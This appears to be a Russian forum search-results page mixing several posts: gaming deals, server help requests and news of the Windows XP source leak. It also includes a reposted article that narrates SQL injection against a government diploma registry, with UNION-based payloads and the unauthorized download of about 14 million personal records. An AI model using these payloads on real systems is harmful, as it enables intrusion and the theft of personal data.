Результаты поиска по запросу «

do not connect with server

»

Запрос:
Создатель поста:
Теги (через запятую):



Игры Халява uplay Ubisoft 

Продавцы явно ошиблись на две запятых, и теперь предзаказ пятой части тропико (и две иконки в подарок) стоят всего шесть рублей!


Так как это не взлом магазина вашими руками, а ошибка с их стороны, игры вам 100% оставят.

Ссылка на страницу тропико для удобства: http://shop.ubi.com/store/ubiemea/ru_RU/pd/productID.303621200/sac.true


Апдейт: Баг пофикшен, цена вернулась к нормальной. Расходимся.

Для завершения размещения заказа нажмите кнопку "отправить" (submit). КОЛ-ВО НАИМЕНОВАНИЕ ПРОДУКТА Tropico 5 - PC (Электронная загрузка) Port Royale 3 - PC (Электронная загрузка) Алло Gold - PC (Электронная загрузка) АДРЕС ДЛЯ ВЫСТАВЛЕНИЯ СЧЕТА: Редактировать редактировать » НАЛИЧИЕ

Развернуть

что то пошло не так virtual host https Pem hosting пидоры помогите web developers 

Помогите с HTTPS на Apache

Граждане не традиционной ориентации, прошу вашей помощи.

У знакомого моего знакомого случилась проблема с хостингом на котором крутятся дофига сайтов. Он использовал панельку управления сайтами испманагер, но из-за финансовых проблем не стал ее продлевать, соответственно отвалилось автопродление сертификатов для HTTPS. Остальное на первый взгляд вроде работает. 
Подключившись к серверу, я как неопытный пидор, получил сертификаты не традиционным способом, вот так:
sudo certbot certonly --manual --preferred-challenges dns --debug-challenges -d сайт.com -d www.сайт.com
sudo certbot --apache -d сайт.com -d www.сайт.com
в днс внес ключи acme.

Все работало пару дней, пока не стал замечать что для нескольких сайтов браузер начал выдавать такую ошибку:
Ваше подключение не защищено
Злоумышленники могут пытаться похитить ваши данные с сайта сайт.com (например, пароли, сообщения или номера банковских карт). Подробнее…
NET::ERR_CERT_COMMON_NAME_INVALID
Subject: сайт_номер9.com
Issuer: R3

По данному коду в инете много предположений. Нем могу понять что случилось.
Получил повторно сертификат но ошибка не пропадает. Такое впечатление что Апач как то закешировал ключ для сайт_номер9.com и выдает его каждый раз. Причем в файлах для виртуальных хостов (/etc/apache2/vhosts) правильно прописаны пути к сертификатам /etc/letsencrypt/live, в директории символьные ссылки на реальные файлы *.pem в /etc/letsencrypt/archive

Еще заметил что список сайтов для которых используется не правильный сертификат иногда меняется, т.е. сейчас ошибка для сайта сайт.com, через пару часов это будете для сайта сайт2.com. Есть только один сайт для которого такая ошибка постоянная, его имя в формате 1ххххх.com и совпадает с именем сервера.
Развернуть

Windows Операционная система Windows XP исходники новости утечка Microsoft 

В сеть утекли исходные коды операционной системы Windows XP и Server 2003


Microsoft® Windows*15 c 3 Copyright © Microsoft Corporation Microsoft,Windows,Операционная система,Windows XP,исходники,новости,утечка,Microsoft,Майкрософт

В сеть попал исходный код Windows XP SP1 и других версий операционной системы.


На форуме 4chan опубликовали 43 гигабайта файлов, которые можно загрузить через Torrent.


Помимо Windows XP и Server 2003 в файлах утечки можно обнаружить и более старые версии операционной системы Microsoft. В том числе MS DOS 3.30, MS DOS 6.0, Windows 2000, Windows CE 3, 4 и 5, Windows Embedded 7, Windows Embedded CE, Windows NT 3.5 и Windows NT 4.


Утечка включает в себя исходные коды DirectX 8, Microsoft Paint, игр Hearts на C++, Reversi и «Пасьянса». Кроме того, в файлах можно обнаружить коды mssipotf, которые позволяют подписывать файлы шрифтов и проверять подписи, mscms — системы управления цветом от Microsoft и Postscript шрифтов UI драйвер NT\printscan\print\drivers\usermode\driverui\ps и makentf.

Среди файлов также есть папка с названием «медиа», в которой можно найти коллекцию видео с конспирологическими теориями вокруг Билла Гейтса. В дополнение к торрент-файлу неизвестные опубликовали архив только с исходным кодом XP и Windows Server 2003 на 2,9 Гб.


Как утверждает автор утечки, исходный код Windows XP «годами» перемещался от хакера к хакеру, но впервые оказался доступен публично. В Microsoft пока не подтвердили, действительно ли в сеть попал код её старых ОС.

Исследователи и раньше могли изучить систему с помощью реверс-инжиниринга, однако это был долгий и трудоёмкий процесс. Но имея полный исходный код хакеры смогут намного проще находить уязвимости и баги.

Файлы в утечке кода Windows XP

Несмотря на то, что Windows XP вышла почти 20 лет назад, утечка её исходного кода может представлять опасность для современных компьютеров. Если в Microsoft всё ещё используют какие-то части кода в новых версиях систем, то в них могли попасть те же уязвимости и баги.


Кроме того, многие государственные ведомства и отдельные организации по всему миру всё ещё используют Windows XP для работы. По данным на август 2020 года, на старой системе работало 1,2% компьютеров в мире или около 25 миллионов устройств — это больше, чем на Windows 8 (0,57%), ChromeOS (0,42%) и Windows Vista (0,12%).

Microsoft прекратила поддержку Windows XP ещё в апреле 2014 года. Таким образом, система уже более шести лет не получала важных технических обновлений и патчей безопасности.




Развернуть

Отличный комментарий!

А там в списке конспирологических теорий есть версия что винду слили сами микрософты, что бы больше перешло уже на 10?
asd072 asd07225.09.202013:59ссылка
+38.6

it-юмор geek курсы 

ГРЕСТИ БАБЛО ★ КРУЖОК ЛЕГКОВЕРНЫХ ГУМАНИТАРИЕВ ★ эгожа\^,it-юмор,geek,Прикольные гаджеты. Научный, инженерный и айтишный юмор,курсы
Развернуть

взлом информационная безопасность sql длиннопост geektimes habrahabr текст много букв СНИЛС дыра ...story PostgreSQL obrnadzor инн рособрнадзор 

"И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках"

"https://habrahabr.ru/post/347760/"


Одиноким вечером, глядя на свою пустую зачётку и осознавая, что конец близок, я снова задумался о том, как бы мне сейчас собрать сумку, или даже просто рюкзак, положить туда рубашку, шорты и свалить в тёплую страну. Было бы хорошо, да вот с дипломом живётся намного лучше. Во всяком случае, мне всегда так говорят.

Также часто слышал много историй про людей, которые приходили на собеседования с красными дипломами МГУ, но при этом абсолютно не разбирались в своей специальности, а потом на корпоративах признавались, что диплом у них купленный.

Но времена сейчас другие, сейчас 21 век, век больших возможностей, любой работодатель, который умеет пользоваться мышкой и знает, как выглядит браузер на рабочем столе, может проверить данные диплома. Каждый диплом, который выдаётся учебным заведением, теперь регистрируется в едином реестре, доступ к которому есть у каждого через сайт Федеральной службы по надзору в сфере образования и науки.


ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ ОБРАЗОВАНИЯ И НАУКИ
РОСОБРНАДЗОР,взлом,информационная безопасность,sql,PostgreSQL,длиннопост,geektimes,habrahabr,текст,Истории,obrnadzor,много букв,рособрнадзор,СНИЛС,инн,дыра



Для получение информации о документе об образовании достаточно просто заполнить форму, передвинуть слайдер и нажать кнопку. Вам либо покажут информацию о документе, либо скажут, что такого нет (но ещё рано обвинять соискателя в обмане, мало ли, что могло произойти).


Для поиска введите точные значения реквизитов, указанные на бланке документа: Более подробно о работе с данным сервисом можно ознакомиться по ссылке
Уровень образования
Не выбрано
Уровна* обрио
Наименование 00: Фамилия обладателя документа: Серия бланка: Номер бланка Дата выдачи:
О Найти 00



Ну и пока я смотрел на эту форму, решил я с ней поиграться. Повводил всякой чепухи, и бац — на поле, в которое было введено 1', я получаю такой response:

<h2>Произошла ошибка</h2><p>SQLSTATE[42601]: Syntax error: 7 ERROR: syntax error at or near "4"LINE 6: ...me) = UPPER('1'')) AND (doc.education_level_id = '4') AND (U... ^</p>


Голый SQL Injection. Очевидно, что задачи продумать обработку ошибок перед разработчиком не было. Задача была сделать сервис, который работает. Сервис, который является гарантом. Так одинокий вечер превратился в весёлую одинокую ночь.


Ещё будучи подростком я очень любил всякие крутые истории про хакеров, а после того, как решил заняться программированием, изредка почитывал и интересные статьи по взлому и прочему. Так что то, что нужно делать дальше — я знал.

Так как разработчик этого сервиса дал нам удовольствие видеть ещё и часть запроса, то мы можем с уверенностью предположить, что это SELECT запрос. Теперь нам нужно как-то обнулить действие запроса, записанного в php-скрипте, а потом с помощью переменной вставить свой.

Для обнуления запроса достаточно просто добавить невозможное условие и закомментировать последующие строки запроса, что-то наподобие:

Инъекция

...me) = UPPER('1') AND (1=0)) — ')) AND (doc.education_level_id = '4') AND (U…


В ответ просто пришло сообщение о том, что документ не найден.

Также пробовал использовать вместо невозможного условия, наоборот, очевидные. А именно пробовал искать какой-либо документ по id. Писал id=1, id=1024 и прочее, но результатов не дало. Видимо, id давно перевалило за тысячи (спойлер: за миллионы).

Также я совершенно не надеялся на то, что запрос придёт без ошибки. Я был уверен, что пробелы будут экранироваться, удаляться, запрещаться, ещё что-нибудь. Ведь в форме на странице поиска ввести фамилию с пробелами невозможно. Но всё оказалось в разы проще.

Ну а теперь бы хотелось вытащить что-то действительно интересное. Изменить структуру ответа мы не можем никак, то есть если в запросе были, например, SELECT id, name, count, то так оно и останется. Значит надо подстраиваться, а для начала понять, какие же данные запрашиваются из БД, и, главное, сколько? Существует много способов узнать количество полей, но мне помог только ORDER BY. Как это работает?

ORDER BY сделан для сортировки, но его синтаксис не требует обязательно указывать имя поля, достаточно указать его позицию в запросе. Если указать номер позиции больше, чем количество запрашиваемых полей — то будет ошибка. Методом перебора можно подобрать количество полей. Их оказалось 55.

Хочется понять, с чем же мы работаем, что это за база данных такая? Предположим, что это MySQL, в MySQL есть функция Version(), которая возвращает версию БД. Применим:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,version(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…


В ответ пришёл JSON, в котором было:

PostgreSQL 9.1.2 on x86_64-alt-linux-gnu, compiled by x86_64-alt-linux-gcc (GCC) 4.5.3 20120111 (ALT Linux 4.5.3-alt1.M60C.1), 64-bit
Отлично, мы знаем систему, версию БД (под неё вроде даже эксплоиты были). Поле для действия расширилось. Узнаём, как выглядит запрос:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,current_query(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…


Ответ:
"SELECT "doc".*, "doc_type"."type", "stat"."name" AS "status", "level"."name" AS "level", "rec"."name" AS "rec_name", "rec"."surname" AS "rec_surname", "rec"."patronymic" AS "rec_lastname" FROM "documents" AS "doc" LEFT JOIN "document_types" AS "doc_type" ON doc_type.id = doc.document_type_id LEFT JOIN "document_packages" AS "dp" ON doc.document_package_id = dp.id LEFT JOIN "documents_status" AS "stat" ON stat.id = doc.status_id LEFT JOIN "education_levels" AS "level" ON level.id = doc.education_level_id LEFT JOIN "recipients" AS "rec" ON rec.id = doc.recipient_id WHERE (dp.status = 3) AND (doc.organization_id = '573') AND (doc.year = '2018-01-01') AND (UPPER(rec.surname) = UPPER('1')) UNION SELECT 1,current_query(),'3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '01.01.1970', '01.01.1970', '21', '01.01.1970', '23', '24', '25', '26', '01.01.1970', '28', '29', '30', '31', '32', '33', '28-05-2004 11:11:59', '35', '36', '28-05-2004 11:11:59', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55' -- ')) AND (doc.education_level_id = '4') AND (UPPER(doc.series) = UPPER('1')) AND (doc.number = '1') LIMIT 1"

Вся картина перед нами.

Попробуем узнать, что же за таблицы есть во всей базе данных:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,table_name,тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.tables — ')) AND (doc.education_level_id = '4') AND (U…


Таким образом получили все таблицы. Узнаём столбцы каждой таблицы следующим образом:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,CONCAT(column_name,' ',data_type,' ',is_nullable),тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.columns WHERE table_name='Какое-то имя таблицы' — ')) AND (doc.education_level_id = '4') AND (U…


Итак, зная структуру базы данных, я написал скрипт на Питон и выкачал все самые интересные на мой взгляд данные. А именно:

Таблицу с дипломами об образовании (серия, номер, год поступления, год окончания, СНИЛС!, ИНН!!, серия и номер паспорта (честно говоря, у всех записей поля пустые, но сам факт!), дата рождения, национальность (зачем?), учебная организация, выдавшая документ), таблицу с гражданами с образованием (там всё проще: ФИО и всё), таблицу с пользователями системы (стандартно, логин, email, и, НЕОЖИДАНО, md5 хэш пароля, хоть не сам пароль), отдельная таблица admin с одной записью (так же: логин, хэш пароля и прочее), таблица с информацией об учебных заведениях (кто начальник, email, телефон, лицензия — в общем всё, что и так есть в открытом доступе) и ещё кучу вспомогательных таблиц.

По объёмам получилось: около 14 000 000 документов об образовании, около 14 000 000 записей с данными о бывших студентах, 1322 пользователя системы, 1 админ, который логинится по будням в системе, видимо, когда на работу приходит, 3391 учебное заведение и горы непонятной информации типа ОКОГУ и прочее. База весом 5 гб.

А теперь представьте, сколько времени это качалось. Вы думаете, кто-то заметил? Может быть сервис резко отключился, ip заблокировали или ещё что-то? НЕТ!

Конечно, целью не является использовать эту информацию в корыстных целях (да я и не представляю, как). Иначе бы я не писал статью здесь. Но и писать лично администрации сайта или кто там за него отвечает я тоже не горю желанием, хватило истории про Микротех.

Дополнительно решил проверить хэши по радужным таблицам. Не уверен, конечно, что они хэшировались именно голым md5, но, во всяком случае, в открытых базах данных совпадений ни к одному хэшу не нашлось. Или я что-то не умею.

Мог бы я продолжить и получить доступ в систему? Смог бы я сам изменять записи и добавлять свои? Вполне возможно, но я решил этого не делать. Да и сессию надо закрывать, без диплома-то никак…


Развернуть

пидоры помогите wow Warcraft Blizzard фэндомы кривые руки 

Проблема с домашним сервером WOW.

Уважаемые пидоры, сам не осилил и прошу помощи. Суть токова: поднял на домашнем компьютере сервер WOW на базе Mangos (Classic DB version 1.10.1 "The Shifting Sands". For core Classic z2742). С того же компьютера запустил клиент, всё работает корректно. С другого компьютера, находящегося в той же локальной сети, зайти в игру тем же клиентом не удаётся на этапе выбора мира - клиент видит сервер, предлагает выбрать мир, который отображён зелёным, а при его выборе думает пару секунд и снова предлагает выбрать мир. По рекомендациям из интернета я настроил порты, вписал локальный адрес реалма в базу SQL через HeidiSQL, отключал брендмауэр, но ничего не помогло. Файлы между компьютерами ходят без проблем через локальную сеть, на обеих машинах windows 10. Нашёл на одном форуме человека со сходной проблемой (https://wowjp.net/forum/236-247500-1), но исправить ситуацию его способом не смог. Памагити.
ПИД OPbl,,пидоры помогите,реактор помоги,wow,Warcraft,Варкрафт,Blizzard,Blizzard Entertainment, Близзард,фэндомы,кривые руки
Развернуть

Игры Half-Life 

И так, сегодня мы решили поиграть в Half-life 1 :)

Для того что бы поиграть нужно:
1) Скачать клиент:
http://narod.ru/disk/56938244001.25977d91483d9a6ce2c3d65557c2d5d3/Half-Life_1_Internet_Edition.exe.html
2) Устанавливаете
3) Настройте под себя игру (не забудте сменить ник)
4) Открываете консоль (буква ё (~) )
5) Пишете:
connect 94.103.52.139
Игры,Half-Life
Развернуть

Комиксы таблетка просветление 

Смешные комиксы,веб-комиксы с юмором и их переводы,таблетка,просветление
Развернуть

Steam халява Steam Игры 

Dead by daylight (Дед в дневном свете)

Steam халява,Steam,Стим,Игры


Стоит : 11 бакачей. Карточки присутствуют


Видимо какой-то зомби сурвайв...

Получить код можно просто, в несколько шагов.

1. Заходим на сайт http://beta.deadbydaylight.com/

2. Конектим Стим

3. Просим 2-х друзей перейти по ссылке что б вас спасли (ну или не вас)

4. Вы и ваши друзья получат код на сайте.


Развернуть

JazzJack-KHT artist Kyaru (Princess Connect!) Princess Connect! Игры 

JazzJack-KHT,artist,Kyaru (Princess Connect!),Karyl (Princess Connect!), Кяру,Princess Connect!,Princess Connect! re dive, PriConne,Игры

JazzJack-KHT,artist,Kyaru (Princess Connect!),Karyl (Princess Connect!), Кяру,Princess Connect!,Princess Connect! re dive, PriConne,Игры

Развернуть
В этом разделе мы собираем самые смешные приколы (комиксы и картинки) по теме do not connect with server (+1000 картинок)